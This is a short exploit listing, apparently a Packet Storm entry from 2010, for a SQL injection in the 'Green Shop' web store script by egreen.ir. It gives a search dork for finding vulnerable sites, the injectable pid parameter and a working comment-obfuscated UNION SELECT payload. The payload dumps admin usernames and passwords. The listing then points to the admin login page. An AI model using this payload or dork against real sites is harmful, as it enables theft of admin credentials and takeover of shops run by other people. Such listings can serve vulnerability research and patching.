Green Shop SQL Injection

🗓️ 08 Jul 2010 00:00:00Reported by Ashiyane Digital Security TeamType

packetstorm🔗 packetstormsecurity.com👁 27 Views

Green Shop SQL Injection vulnerability by egreen.ir with exploit through http://site.org/index.php?pid=[SQLi], login page: http://site.org/admin/login.ph

`~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
[x] Tybe: SQL Injection Vulnerabilities  
[x] Vendor: egreen.ir  
[x] Script Name: Green Shop  
[x] author: Ashiyane Digital Security Team  
[x] Thanks To N4H  
[?] Submit By PrinceofHacking ^_^  
[x] Mail : Prince[dot]H4ck@gmail[dot]com  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
D0rk: "egreen.ir"  
  
  
Exploit:  
http://site.org/index.php?pid=[SQLi]  
  
Ex:  
http://site.org/index.php?pid=77/**/Union/**/SELECT/**/Group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/admins/**/--  
  
Login Page :  
http://site.org/admin/login.php  
  
  
Special Tnx : All Ashiyane Members  
  
`

08 Jul 2010 00:00Current

0.3Low risk

Vulners AI Score0.3